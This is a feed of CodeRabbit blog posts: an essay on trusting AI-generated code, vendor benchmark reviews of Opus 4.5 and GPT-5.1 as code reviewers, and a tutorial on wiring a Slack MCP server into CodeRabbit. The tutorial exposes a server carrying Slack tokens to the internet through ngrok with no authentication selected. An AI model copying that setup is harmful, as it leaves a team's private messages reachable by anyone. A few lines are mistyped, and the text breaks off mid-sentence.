The [2025 Stack Overflow survey](https://survey.stackoverflow.co/2025/) reveals a paradox: while 84% of developers express confidence in adopting AI tools, nearly half (48%) still distrust the accuracy of their outputs. This tension between optimism and skepticism has reshaped how teams think about quality assurance. ![2025 Stack Overflow survey 48% of developers still distrust the accuracy of their outputs](https://victorious-bubble-f69a016683.media.strapiapp.com/ee7e860f6707919f9ff0ae4a26d3561373b6db38e6872c52a132ad7c28b6f0b1_320f3d4133.png) ## **From PRD to PR in days (not weeks)** The bottleneck in software development has fundamentally shifted from writing code to validating it. In the early days of AI-assisted development, the workflow was straightforward: AI suggested code, humans read the suggested snippet and then decided whether or not to accept that suggestion. Tab completion wrote boilerplate. Copilot suggested functions. But a senior engineer still manually validated and chose each line of code to ensure its quality, structure, and safety before making a pull request. Today's reality is different. Advanced reasoning models like OpenAI's o1 can decompose complex requirements and generate entire features. This set the flywheel in motion for the era of agentic code generation, where humans along with agents play an active role in generating large swaths of code. The difference between accepting AI-generated code one snippet at a time and adding in AI-generated features is significant. Devs are more likely to miss issues with its quality, structure, and safety. Reviewing AI-generated code also takes much more time. The bottleneck isn't writing code anymore - it's trusting it. ## **The AI-generated code crisis nobody's talking about** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e8fc30da09029c65abfa651f08202a821bf2b4ef92102d1c996fa345a3c0872d_86065a1daa.png) Engineers are right to be skeptical, since [**over 40% of AI-generated code still contains security flaws**](https://cyber.nyu.edu/2021/10/15/ccs-researchers-find-github-copilot-generates-vulnerable-code-40-of-the-time/) and here is what AI-generated code often gets wrong: * **Dependency explosion**: A simple prompt for a "to-do list app" can generate 2-5 backend dependencies depending on the model. Each dependency expands your attack surface. Worse, models trained on older data suggest libraries with known CVEs that were patched after their training cutoff. * **Hallucinated dependencies**: AI invents package names that don't exist. Attackers register those names in public repositories with malicious code. Developers install them blindly. This attack vector, called "slopsquatting," is uniquely enabled by AI code generation. * **Architectural drift**: The AI swaps out your cryptography library, removes access control checks, or changes security assumptions in ways that look correct but behave insecurely. These are the bugs that static analysis misses and humans don't catch until production. ## **Why did reasoning models change everything?** A few years back, applying AI to a collaborative workflow like Code Review met with a degree of amused skepticism. The bots would catch your missing semicolons, flag unused variables, and maybe (if you were lucky) warn you about a potential null pointer. They were fast, cheap, and fundamentally shallow. At CodeRabbit, when we started to apply Generative AI, we realized this problem pretty early and developed a technique that you see on some of our older PRs, called monologue where the model thinks through the issue and shares reasoning behind an issue comment. With the launch of reasoning models like OpenAI’s o1 and o3 the models actually think through the problem thanks to the **monologue feature** on CodeRabbit. When you ask GPT-4o to review code, it pattern-matches against things it's seen before and code review feedback is mostly superfluous. When you ask GPT-5 or Claude Sonnet 4.5, it spends time reasoning through your code's logic, tracing execution paths, considering edge cases, and understanding intent. This was important for successful code review. But there is a catch! ## **What makes code review more "agentic"?** Many thought that applying the same reasoning models to review the code they generated would cut slop or find bugs, but this wasn't entirely true. The two major missing pieces were effective context assembly (context engineering) and verifying the veracity of the results. Traditional code validation tools are reactive. You run a linter, it tells you about unused variables. You run a static analyzer, it warns about null pointer exceptions. You run security scanners, they flag hardcoded secrets. Each tool does one thing, in isolation, with no context about what you're actually trying to build. With generative AI, you might integrate these tools into your review pipeline. However, neither the model nor the tools are intelligent enough to effectively filter out noise and highlight crucial signals, leading to context clogging. To effectively counter that, we developed techniques to engineer and manage the context for each model in the review pipeline. For example: We would prepare the list of most important issues suggested by all the tools in an instructive manner to the reasoning model, for better solutions. We also added a verification agent that checks and grounds the review feedback. Here are some examples from the open-source PRs. **Static analysis**: AST parsing with tools like ast-grep to understand code smells. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b8b0787dd36f7c2860133a6a6dfd2e911731ad566628f2d774bb5a33757e3d9f_4fa64c8fc8.png) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b6a7bf4e18c84ccf407d65bd4a33c797fc0c7c014af2955871370817d32882e6_d977a0c061.png) **Incremental analysis**: Only validating wAgentiAgenhat changed, not your entire codebase. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/6651566b1e253c95f62767b663a2eb761c41889b88fbb8de0e8bba678a8c72f3_ec384536e0.png) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/450fe46203c9ee8c511b09fac7e4fae07d36b86bb797ba8fb984bc85178ca498_8065dbfbc9.png) **Security issues**: Prompt injection attacks and edge case generation. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e314fe102042ac1c338927cd439a5d7cbde6b864184d5c1932486df28857cf83_ecab733dd0.png) **Name refactoring**: Suggesting better variable and function names based on usage. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/0620d243a573ec072f190ae01c9a5fae61ca9a666462796cda76fc5016d60a76_d8cc8f63fe.png) The "agentic" part means the AI decides which tools to run, interprets the results, and takes action. Think of it like having a senior engineer who knows when to dig deeper and when something is *not* fine ## **How CodeRabbit closes the AI code trust gap** Instead of chasing higher benchmark scores or relying on traditional metrics, CodeRabbit focuses on how AI systems actually perform in live engineering environments through custom evaluation methods, some visible directly on the PRs we review. The technique of agentic code validation happens on each pull request reviewed by CodeRabbit; however, everything runs in **isolated, sandboxed environments**, what we call “tools in jail.” As described in our [Security Posture](https://www.coderabbit.ai/blog/our-security-posture-how-we-safeguard-your-repositories), this approach ensures that verification agents can safely execute, inspect, and even stress-test code without ever compromising user data or infrastructure [integrity.](http://integrity.at) Agents excel at catching common vulnerabilities, analyzing patterns across thousands of lines, and running comprehensive test suites. They're designed to surface issues that are tedious or time-consuming for humans to catch manually. But agentic code validation isn't going to replace code reviews entirely. Instead, it frees developers to focus on what humans do best: architectural reasoning, business logic validation, and nuanced security considerations. The human-in-the-loop and agent-in-the-loop processes can coexist, providing redundancy and complementary reasoning similar to peer programming. ***Want to see agentic validation in action? Sign up for a*** [***14-day CodeRabbit trial.***](https://coderabbit.link/nFI6lmf)

Opus 4.5 for code-related tasks: Performs like the systems architect

David Loker — Mon, 24 Nov 2025 00:00:00 GMT

## **Every model reasons. Opus 4.5 audits.** Every new model arrives with the same promise: smarter reasoning, cleaner code, and better answers. But Opus 4.5 from Anthropic doesn’t just reason; it *audits*. It reads code as if returning to a system it helped design, identifying weak points and refining architecture. Where other models narrate their logic or prescribe surgical fixes, Opus 4.5 performs structured, systematic reviews that feel more like technical documentation than conversation. We integrated Opus 4.5 into CodeRabbit’s benchmark harness to understand what makes this model distinct. The result was not higher raw intelligence or flashier prose, but discipline. This model doesn’t just find bugs; it *builds context* around them. It treats review as an engineering process, rather than a guessing game. ![Opus 4.5 vs. GPT 5.1 and Sonnet 4.5](https://victorious-bubble-f69a016683.media.strapiapp.com/e2f436e1339c66056dfbd4a7a9c2f779cd815e082f7b23dfe52e96ddda4e1f59_6ddfa561bb.png) ## **Benchmarking context for Opus 4.5** ![Opus 4.5 benchmarking context](https://victorious-bubble-f69a016683.media.strapiapp.com/601a64a018c8b97d86f8fdc489fecf27e1eb61b0db89b7841eef34454b415f01_151a4483dc.png) At CodeRabbit, we evaluate new LLMs using a controlled benchmark of **25 complex pull requests** seeded with known error patterns (EPs) across C++, Java, Python, and TypeScript. Each comment generated by a model is scored by an LLM judge for three key factors: * **Precision:** Whether it correctly identifies the EP. * **Important-share:** The percentage of comments that are genuinely critical or major (real bugs, not style issues). * **Signal-to-noise ratio (SNR):** The ratio of important to unimportant comments. Our evaluation framework, refined over multiple generations of models, combines automated LLM judging with **hand validation** to ensure accuracy. We also use **multiple judges and repeated trials** to measure consistency and understand variance. Each iteration improves the process through better prompts, refined labeling, and expanded coverage, resulting in more reliable outcomes. ## **Scoreboard (Actionable comments only)** ![Opus 4.5 vs GPT 5.1 and Sonnet 4.5](https://victorious-bubble-f69a016683.media.strapiapp.com/f990cdf91d1adb4bde1755d893b2fa42178505a515f5d080b6468afd48021031_3f6c16a7b1.png) **What this means:** Opus 4.5 sits between Sonnet 4.5’s high-volume, verbose style and GPT-5.1’s lean, surgical precision. It delivers higher per-comment precision and a greater share of meaningful findings than Sonnet 4.5. While it recorded one fewer EP pass (15 vs. 16), that difference falls within normal variance. In several runs, Opus 4.5 matched or even surpassed both GPT-5.1 and Sonnet 4.5. The takeaway is a model that balances signal, structure, and coverage with consistent reliability. ## **Style and tone of Opus 4.5** ![Opus 4.5 vs GPT 5.1 and Sonnet 4.5](https://victorious-bubble-f69a016683.media.strapiapp.com/ecdc4f4032514f950ff9acb7df79c7b3f2c2707c2f920ea83f89bec1963bdde1_129eb1004d.png) Opus 4.5’s reviews are structured, concise, and focused. With assertiveness around 33% and hedging near 15%, its tone reads as measured and professional. The balance of tone and density gives it an analytical voice that feels practical and confident. The high use of code blocks and diff patches underscores its bias toward action; it talks less and *edits more*. ![Opus 4.5 style and tone ](https://victorious-bubble-f69a016683.media.strapiapp.com/fbf7956b821b024bd933a1358bba7e873b6b743a4841a0e9b87d9e7d3483c211_3da751739f.png) ## **Structured intelligence: Predictable form and cross-language consistency** Opus 4.5’s comments follow an architectural rhythm of headline, rationale, and diff. Nearly 80% include code blocks, and most conclude with a concise patch. Each resembles a clear bug report that specifies cause, effect, and resolution. This structure holds across languages. Whether reviewing C++, Java, Python, or TypeScript, the cadence remains consistent, averaging 19 lines and 790 characters per comment. This uniformity simplifies automation and enhances readability. It also makes Opus 4.5 feel like a single engineer’s consistent voice across an entire codebase. * *C++ (WorkerThreadPool):* Detects a lost wakeup race with a three-step interleaving and a one-line diff fix. * *Java (OrderService):* Flags a missing volatile on a double-checked lock and provides the corrected pattern. * *Python (Batch client):* Replaces a synchronous HTTP client with an asynchronous equivalent to prevent blocking calls. * *TypeScript (Cache manager):* Identifies that Number.MAX\_SAFE\_INTEGER disables eviction and suggests realistic defaults. These are concise, code-native insights, each actionable and grounded in sound reasoning. ## **The confidence inversion** Opus 4.5’s tone is balanced but occasionally reveals a subtle inversion: when it is wrong, it can sound slightly more certain. Although the model is generally measured, this behavioral quirk means tone alone is not always a reliable indicator of correctness. To account for this, we pair tone data with correctness metrics in evaluation summaries to maintain consistent calibration. Opus 4.5 rarely speculates; it simply explains, even when it’s wrong. ## **System-level reasoning: Fixing context, not just code** While most models target the immediate defect, Opus 4.5 focuses on the surrounding system. Its recommendations frequently adjust lifecycles, add safety checks, or refine defaults. Examples: * **TypeScript Cache:** Rewrites eviction logic, adds TTL enforcement, and updates defaults to prevent silent OOM. * **Java OrderService:** Replaces HashMap with ConcurrentHashMap and identifies missing ExecutorService shutdown. * **Python Client Lifecycle:** Adds explicit shutdown hooks for long-lived async clients. * **C++ FileAccessEncrypted:** Resolves a validation bug that blocked all encrypted files and improves upstream error handling. These are not single-line fixes but systemic corrections. The model treats code as an interconnected ecosystem rather than a collection of isolated issues. ## **Cost, effort & efficiency** Anthropic’s Effort parameter provides direct control over how deeply the model reasons. In high-effort mode, Opus 4.5 explores every dependency path. In medium-effort mode, it trims reasoning depth to save tokens. Even with high-effort reasoning, its reviews averaged about 25% fewer output tokens than Sonnet 4.5, balancing higher per-token costs ($25 per million output tokens) with greater efficiency. This disciplined structure pays for itself by producing fewer digressions and maintaining consistent clarity. ## **What it feels like to read Opus 4.5** ![Reviews of Opus 4.5](https://victorious-bubble-f69a016683.media.strapiapp.com/4b00e475fdcf8f13179fe4897d32e1ce78e146d69c6ab88726464c41fe6d43be_8fd7b18186.png) If Sonnet 4.5 feels like a teacher and GPT-5.1 like a decisive teammate, Opus 4.5 is the **architect reviewing your PR**. Its tone is calm and deliberate, never commanding. It assumes you understand the domain and aims to confirm the details. The result is feedback that reads like peer review from a systems engineer: consistent, structured, and quietly authoritative. ### **Tone and personality** Opus 4.5’s voice is measured and analytical. It rarely uses dramatic language or unnecessary severity. Instead, it conveys certainty through order, concise summaries, specific evidence, and focused corrections. The tone builds trust, delivering feedback that feels like it comes from a mentor familiar with your system. ### **Depth vs. density** Its comments are compact yet informative. When an issue warrants detailed explanation, Opus 4.5 delivers it without excess. For simpler problems, it resolves them with brief, precise advice. This balance of detail and brevity keeps reviews readable and comprehensive. ### **Flow and readability** The model’s structural rhythm of context, cause, and correction allows developers to scan quickly while retaining meaning. Developers often describe its comments as “structured snapshots” that tell a short, self-contained story: what happened, why it matters, and how to fix it. ### **Practical impact and developer trust** Because Opus 4.5 avoids inflated confidence and theatrical phrasing, developers trust it more readily. It comes across as confident yet professional, firm but not forceful. When it errs, it sounds like a reasoned hypothesis instead of an overreach. That restraint, more than precision alone, makes its reviews feel *professionally human*. Each comment reads like a design note. It states the invariant that failed, proposes a patch, and explains the rationale inline. The clarity is high enough that many of its comments could be pasted directly into changelogs or issue trackers without revision. ## **Strengths and weaknesses of Opus 4.5** ![Opus 4.5 strengts and weaknesses](https://victorious-bubble-f69a016683.media.strapiapp.com/af81aed5f612ea21bfc587632e61c75ae9b1f9ba197b08ba03328c305ecb7f3f_e0d923f21d.png) **Strengths:** * High signal density (≈80% important comments). * Consistent structure across languages. * Strong concurrency and lifecycle reasoning. * Clear, concise, and professional tone. * Lower verbosity than Sonnet 4.5 with more context than GPT-5.1. **Weaknesses:** * Moderate precision (≈38%). * Subtle confidence inversion when incorrect. * Frequent critical or major labeling may overwhelm busy PRs. * Slight verbosity on simpler issues. **Bottom line:** Opus 4.5 is the most *systemic* reviewer we’ve tested. Calm, structured, and exacting, it excels when reasoning breadth and architectural understanding matter more than pinpoint precision. ## **When to use which model** | **Scenario** | **Best model** | **Why** | | --- | --- | --- | | Cross-language or high-context reviews | **Opus 4.5** | Structured, consistent, strong at systemic issues | | Tight precision or small diffs | **GPT-5.1** | Higher EP precision, decisive tone, fewer false positives | | Bulk scans, cost-sensitive workloads | **Sonnet 4.5** | High coverage, lower cost per review | ## **Closing thoughts: The shape of reasoning** Opus 4.5 no longer feels experimental; it feels engineered. Earlier models often guessed, while Opus 4.5 measures, structures, and documents. Reading its reviews feels like working with a model that truly understands *how developers read*. In code review, tone defines trust. Opus 4.5’s style, measured, structured, and mechanically precise, demonstrates the maturity of reasoning: precision without pressure and confidence without ego. **Takeaway:** If Sonnet 4.5 was a teacher and GPT-5.1 a teammate, Opus 4.5 is the architect returning for a design review. ***Interested in trying CodeRabbit?*** [***Get a 14-day free trial.***](https://app.coderabbit.ai/login???free-trial)

How to deploy and integrate MCP servers with CodeRabbit

Ankur Tyagi — Thu, 20 Nov 2025 00:00:00 GMT

MCP servers integrate AI agents into software applications to carry out system-related tasks based on users’ requests. Platforms like Slack, Sentry, Notion, and GitHub Copilot have adopted MCP-style services to expose their features to AI-driven applications. CodeRabbit is part of this shift, acting as an MCP client that enables users to provide contexts and perform the best code reviews. It’s also the first AI code review platform that supports context (data) from multiple sources, such as business requirements stored in Confluence, system information from your CI/CD pipeline, or any internal MCP server. In this tutorial, you will learn how to set up a Slack MCP server, retrieve channel data, and pass it as context into CodeRabbit to generate code reviews that incorporate discussions from your team workspace, ensuring that every review aligns with the project goals. ## **Why use MCP with CodeRabbit?** The primary benefit of using MCP servers with CodeRabbit is to deliver relevant data that makes code reviews more insightful and actionable. Other benefits include: * **Enriching code reviews with context from multiple tools.** CodeRabbit enables you to retrieve relevant information from Slack, Confluence, CI/CD pipelines, or internal MCP servers so reviewers understand the reasoning behind changes. CodeRabbit can pull relevant information from Slack threads, discussions, and messages to understand the code logic and reasoning behind every code change. * **Making informed and precise reviews** With access to data from MCP servers, CodeRabbit gains a better understanding of the project’s logic and goals. For instance, the Slack MCP server grants CodeRabbit access to team messages, enabling it to perform code reviews that are consistent with business requirements and development objectives. ## **Prerequisites** Before we proceed, you need to have the following tools installed to set up the MCP server and integrate it with CodeRabbit: * [**Slack channel**](https://slack.com/) – An existing Slack channel is required to fetch messages and provide context for the AI code reviewer. * [**MCP Server for Slack Workspaces**](https://github.com/korotovsky/slack-mcp-server) **\- Provides an easy and structured way to expose Slack conversations via the Model Context Protocol (MCP). It already includes built-in Slack API methods (fetching messages, threads, replies, etc.) and is lightweight, Docker-ready, and easy to configure.** * [**Claude Desktop**](https://www.claude.com/download) – Allows you to test the Slack MCP server locally before connecting it to CodeRabbit. * [**Docker**](https://www.docker.com/products/docker-desktop/) – Used to run and host the Slack MCP server in a container. * [**Ngrok**](https://www.npmjs.com/package/ngrok) **–** Used to create a secure public URL for the Slack MCP server, allowing CodeRabbit to access it from outside your local environment. In this tutorial, you will: 1. Learn how to test the Slack MCP server locally with Claude Desktop. 2. Host the server on localhost using Docker. 3. Generate a public URL using Ngrok.. 4. Integrate the MCP server with CodeRabbit. ***Note:*** *While Slack has been experimenting with MCP servers, they don’t currently have one available. This tutorial will cover how to create one yourself*. ## **Set up Slack MCP server with Claude Desktop** Claude Desktop is an MCP client that connects to multiple MCP servers and uses them as sources of context. It allows you to add your MCP servers as connectors and test them locally before deploying them to CodeRabbit or any other platform. Install [Claude Desktop](https://www.claude.com/download) on your computer. Once the installation is complete, open the app and click Manage Connectors. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/2e26f1fad639155b12934ac0e09795bdc954bd8f8a6c1a73764a6755733c003b_83c40e63b5.png) Select **Developer** from the sidebar menu, and click **Edit Config** to configure your MCP server using your Slack authentication tokens. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ae85da218ccea91adf5b2e127072c440e50e720006c523a8137a310be435f948_5ae8430910.png) Follow the instructions in the [GitHub repository to obtain your Slack authentication](https://github.com/korotovsky/slack-mcp-server/blob/master/docs/01-authentication-setup.md) tokens and configure the Slack MCP server in Claude Desktop. Update the **claude\_desktop\_config.json** file with the following JSON configuration.

{
"mcpServers": {
"slack": {
"command": "npx",
"args": ["-y", "slack-mcp-server@latest", "--transport", "stdio"],
"env": {
"SLACK_MCP_XOXC_TOKEN": "xoxc-...",
"SLACK_MCP_XOXD_TOKEN": "xoxd-..."
}
}
}
}

The configuration above uses the xoxc and xoxd Slack authentication tokens to register the Slack MCP server as a connector in Claude Desktop. Once connected, Claude can perform tasks such as retrieving channel messages and using Slack context to enhance code reviews and responses. Restart Claude Desktop to apply the updated configuration and activate the Slack MCP server. [Preview.mp4](https://drive.google.com/file/d/1FoAL0Hi8jhlpFALt41lo2MgcwvpUWKml/view?usp=sharing) ## **Connect the Slack MCP server to CodeRabbit** In this section, you will learn how to run the Slack MCP server using Docker, generate a public URL for it, and integrate it with CodeRabbit to provide context-aware code reviews. Before we proceed, open the Docker application. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/43e0cce1249cff76a71a054c008afb254ef1e97becda986bd157550685150541_8c0ed42256.png) Next, open your terminal and download the required files for the Slack MCP Server using the following commands:

wget -O docker-compose.yml https://github.com/korotovsky/slack-mcp-server/releases/latest/download/docker-compose.yml
wget -O .env https://github.com/korotovsky/slack-mcp-server/releases/latest/download/default.env.dist

Update the **.env** file with your Slack authentication tokens.

SLACK_MCP_XOXC_TOKEN=<your_token>

Start the MCP server using Docker Compose with the following commands:

# Create a dedicated Docker network
docker network create app-tier
# Start the MCP server in detached mode
docker-compose up -

![](https://victorious-bubble-f69a016683.media.strapiapp.com/1129ce378703962be8ac88ebfbf1a9167ef9b9950c4bbed934c66b35a806a43a_4f4675da8a.png) Currently, the Slack MCP server is running on localhost at port 3001. To integrate it with CodeRabbit, it needs to be accessible via an HTTPS endpoint. This can be achieved using ngrok. First, confirm that ngrok is installed by running:

ngrok --version

Next, generate a public URL for your MCP server.

ngrok http 3001

The command above exposes your local Slack MCP server to the internet by generating a secure public URL. Use this URL to connect the Slack MCP server to CodeRabbit. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/12137ea799a43f5f3bebd13d3491f0d4bc95041dc6c8c7fdaa72e26987c67f4b_6417f2b471.png) Open a new terminal and start the [MCP Inspector](https://github.com/modelcontextprotocol/inspector) to test the Slack MCP server using the following command:

npx @modelcontextprotocol/inspector

This will launch the MCP Inspector UI, allowing you to verify that your MCP server is running correctly. In the Inspector, select **SSE** as the transport type and append /sse to the end of your ngrok URL ![](https://victorious-bubble-f69a016683.media.strapiapp.com/1bb62c2a79abca2d267df63512d0b6fabb6c03a0916a7eb16964c09e0c5ab248_f13d919374.png) Once the MCP server is confirmed to be working, you can proceed to integrate it with CodeRabbit. ## **Integrate and test MCP servers with CodeRabbit** Sign in to [CodeRabbit](https://app.coderabbit.ai/login?) and select Integrations from the sidebar menu on your dashboard to add a new MCP server ![](https://victorious-bubble-f69a016683.media.strapiapp.com/4c21215b016897bc82ee7b305d6f0f4bb9a864d26f8da1e44e323a6d7d387c27_9e08e85da1.png) Enter a name and your MCP server URL (for example, https://2bb0002c0e2c.ngrok-free.app/sse) to connect the server to CodeRabbit. Make sure no authentication method is selected. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e4f1c741dd64f9fb45485c40b119f1ff7639e6cf1172fa4a76578fc1ff30ae88_5b6a6af059.png) After connecting the MCP server, you can use it to provide context in all your CodeRabbit code reviews. To test the setup, create a GitHub repository, add it to CodeRabbit, and configure it to have access to your MCP server ![](https://victorious-bubble-f69a016683.media.strapiapp.com/975c3ccd4481be7a2e7572e5044154bf1da5dd7eb4b57b97a8a9c06dfd86521d_3c2d32f480.png) Add a coderabbit.yaml configuration file to the repository to enable CodeRabbit to access and use the MCP server context during code reviews.

language: "en-US"
early_access: false
reviews:
profile: "chill"
request_changes_workflow: false
high_level_summary: true
poem: false
review_status: true
collapse_walkthrough: false
auto_review:
enabled: true
drafts: false
chat:
auto_reply: true

To give the GitHub repository access to your MCP servers, find the GitHub repository and enable MCP servers ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d8d5aeeced3914858c38dc6b68e2c8dc2652ce6f3908a85647fc4048a2b9e190_051f78ce36.png) Next, enter the Path Instructions to ensure CodeRabbit checks for additional instructions before allowing PR merges to the code repository ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e6754dea3cb893710383e08ead7c73ba60ab0dcf85a4724b74614bf166dc83a6_e6942c370a.png) From the image above, the **File Path** specifies which files CodeRabbit should review, while the **Instructions** field provides context on how it should handle those files. Based on the instructions given, CodeRabbit analyses the discussions in your Slack **#dev** channel and ensures that every pull request or code change in your GitHub repository complies with the guidelines defined in that channel. Below is a screenshot showing the messages from the Slack channel ![](https://victorious-bubble-f69a016683.media.strapiapp.com/5a9b0ab71df5bbe3b8362293ab075b90a6c487a7d39320bda14f00f2cc871a44_7c4f9c1d97.png) Here is the code review showing how CodeRabbit reads and adheres to the instructions: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/428b25390364ce9813baf8cef37a0991a3525b5f3444239d8003fdbbaf371c00_f8a342e95f.png) You can check out [the full demo to see how CodeRabbit reads team Slack discussions](https://github.com/tyaga001/test-slack-mcp/pull/7#pullrequestreview-3454174366) and reviews code based on those conversations. *💡* ***Best Practice: Pass only Important Data as Context*** *Irrelevant data can slow down your LLM and increase costs. Keep access limited to specific Slack channels or only include the necessary information for code reviews.* ## **Next steps** In this tutorial, you learned how to integrate the Slack MCP server into CodeRabbit to perform contextual code reviews. CodeRabbit also supports multiple MCP servers by default, including Notion, GitHub Copilot, Sentry, Asana, and many others. That you to enhance code reviews and generate context-aware answers with ease. Using the same approach, you can integrate other contexts or data sources via MCP servers to enable CodeRabbit to generate accurate and actionable responses for your queries. Check out more tutorials and articles on MCP Servers and CodeRabbit: * [Handling ballooning context in the MCP era: Context engineering on steroids](https://www.coderabbit.ai/blog/handling-ballooning-context-in-the-mcp-era-context-engineering-on-steroids?utm_source=chatgpt.com) * [CodeRabbit’s MCP integration: Code reviews that see the whole picture](https://www.coderabbit.ai/blog/coderabbits-mcp-server-integration-code-reviews-that-see-the-whole-picture?utm_source=chatgpt.com) * [How to Integrate MCP Server with CodeRabbit](https://docs.coderabbit.ai/context-enrichment/mcp-server-integrations) ***Interested in trying CodeRabbit?*** [***Start a 14-day trial.***](https://app.coderabbit.ai/login???free-trial)

GPT-5.1 for code-related tasks: Higher signal at lower volume

David Loker — Thu, 13 Nov 2025 00:00:00 GMT

**TL;DR** After prompt tuning and integrating it into our stack, GPT-5.1 now delivers the best precision and signal-to-noise ratio (SNR) we’ve seen in reviews, with fewer comments. It tied for the best-in-class error pattern (EP) recall on our hard benchmark set while posting less than half the volume of comments that competitors did. The result: less noise, better fixes, and reviews that read like patches again. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d4eea47ff0eceeffc2bad666cec2be23d011931f8b9276b16636f1611454a3b1_9d4e5f1016.png) ## **What GPT-5.1 claims to be** OpenAI and the press describe GPT-5.1 as more stable, instruction-following, and adaptive. It powers both "Instant" and "Thinking" modes in ChatGPT. We found that framing surprisingly accurate when it comes to code reviews: the model stays quick and surface-level for nits, but reasons deeply when the bug requires it. We also tried something new. When GPT-5.1 got something wrong, we used the full exchange and its internal reasoning trace to prompt it to reflect. By showing it where it missed the mark and asking how it would change its instructions to do better, the model was able to actually propose concrete edits to its prompt. We used this iterative reflection technique (which surfaced issues like outside-diff sprawl) to refine both its behavior and our system instructions until it got consistently tighter. ## **What We Measured (and Why)** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/97b2dbc0b89cd91059fdd7951e5acba3ca6ef0b0eba4654c342c172901dce572_ded404940d.png) We used the same benchmark harness as in our [GPT-5](https://www.coderabbit.ai/blog/benchmarking-gpt-5-why-its-a-generational-leap-in-reasoning), [Codex](https://www.coderabbit.ai/blog/gpt-5-codex-how-it-solves-for-gpt-5s-drawbacks?), and [Sonnet 4.5](https://www.coderabbit.ai/blog/claude-sonnet-45-better-performance-but-a-paradox?) articles: a suite of **25 hard PRs**, each seeded with a known **error pattern (EP)**. Our scoring focuses on: * **Actionable comments only**: Comments that get posted (not additional suggestions or outside-diff notes). * **EP PASS (per comment)**: The comment directly fixes or surfaces the EP. * **Important comments**: Either EP PASS or another major/critical real bug. * **Precision**: EP PASS ÷ total comments. * **SNR**: Important ÷ (total − Important). We compared: * **GPT-5.1** (new model) * **CodeRabbit Production** (our current reviewer stack) * **Sonnet 4.5** ## **Why adding a new model isn’t a switch-flip** Every model rollout at CodeRabbit is a campaign. We don’t plug in the model and hope; we test, adapt, and gate before shipping because [models are no longer interchangeable.](https://www.coderabbit.ai/blog/the-end-of-one-sized-fits-all-prompts-why-llm-models-are-no-longer-interchangeable?) With GPT-5.1, this meant: * Reducing **outside-diff comments**, which can’t be posted to GitHub. * Tightening **tone and concision** to reduce verbosity. * Re-aligning on **severity tagging** and **instruction interpretation**. This mirrors what we did with [GPT-5 Codex](https://www.coderabbit.ai/blog/gpt-5-codex-how-it-solves-for-gpt-5s-drawbacks?): turn reasoning power into product value by reshaping the model’s behavior. The net result: higher SNR, less fatigue, and no compromise on bug coverage. ## **Scoreboard (Actionable Comments Only)** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/dfcb06f829ef79ee7e688242da8a52ee9ad5c9a1f9e20909105a775276f744b4_b8390d1cb3.png) **Takeaway:** GPT-5.1 matched the highest EP recall while posting the **fewest** comments. It beat both CodeRabbit prod and Sonnet 4.5 on **per-comment precision** and **important share**, delivering **the cleanest high-impact reviews**. ## **What GPT-5.1 feels like in review** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/909ec52e53af530a7ad364d6d7eb983a5d8f7dfce2f13d0082b8bc6432b243df_9caf79eca1.png) The behavioral traits we see in the data align directly with the language metrics we later measure such as 28% hedging and 15% assertive markers. This shows that the tone developers perceive as confident and balanced is borne out in the data. Compared with GPT‑5 Codex and Sonnet 4.5, GPT‑5.1’s comments feel leaner, more conversational, and closer to how experienced engineers actually communicate. Codex could sound mechanical and rigid, while Sonnet 4.5 leaned verbose and academic. In contrast, GPT‑5.1 balances brevity with clarity. Its feedback feels confident but not heavy‑handed, like a trusted teammate explaining a diff. Against CodeRabbit Prod, it feels sharper and more focused. Against Sonnet 4.5, it feels human and restrained. Here’s how that translates in practice: ### **Concise** GPT-5.1 writes fewer, sharper comments that get straight to the point. In one PR, it fixed a lost wakeup bug with a single line: p\_caller\_pool\_thread->cond\_var.wait(lock); no extra context, no unnecessary prose. CodeRabbit prod, by comparison, wrote several paragraphs describing the thread flow before reaching the same conclusion. ### **Direct** When ownership or memory management was at stake, GPT-5.1 didn’t hesitate. It flagged the redundant r->reference() call with: “Ref<Resource> already manages refcounts; remove the manual increment to prevent leaks.” Developers appreciate this directness. It reads like a patch review from a teammate, not a lecture. ### **Pragmatic** GPT-5.1 understands when an issue matters and when it doesn’t. On a cache configuration PR, it identified an unimplemented optimizeMemoryUsage() but correctly noted, “This is minor unless cache growth impacts memory pressure.” Instead of overreacting, it contextualized severity, something Sonnet 4.5 still struggles with. ### **Follows Context** When prompts were vague, GPT-5.1 explicitly explained its assumptions. In an early run, it said: “The prompt didn’t specify helper function scope, so I included one for clarity.” That kind of transparency helped us refine our instructions and made its reasoning trustworthy. Concise, direct, pragmatic, and context-aware are qualities that mirror what we valued most in GPT-5 Codex, but with a steadier tone and more restraint. ## **Style and tone (why GPT-5.1 feels like a peer)** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ce11b979454d0b6286846f0bc3c2f678ab8aae086760a9d25537c138b5617b47_cfb90cfd9a.png) To understand why GPT-5.1 feels different in review, we looked at the same language and structure signals used in our GPT-5 Codex and Sonnet 4.5 evaluations. These include measures like comment length, presence of code or diff blocks, and tone markers for hedging versus confidence. The data paints a clear picture. **How to read this.** While GPT‑5.1’s comments use slightly more characters on average, they deliver that text in clearer structure with fewer sentences that carry more weight. In practice, developers perceive them as shorter and easier to read. GPT‑5.1’s tone is more assertive than both CodeRabbit prod and Sonnet 4.5, and it includes fewer diff blocks overall (76%), which is intentional. Many of these comments were multi‑location fixes, API validations, or design clarifications where a single fenced patch would be misleading. In roughly two‑thirds of those no‑diff cases, a minimal fenced patch *would* have made sense and could further improve clarity. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/cb9fd70a3a513780224ba9d757b6cc4315c130464b63f97ad07206b99a29e5c7_794be9685b.png) Compared to 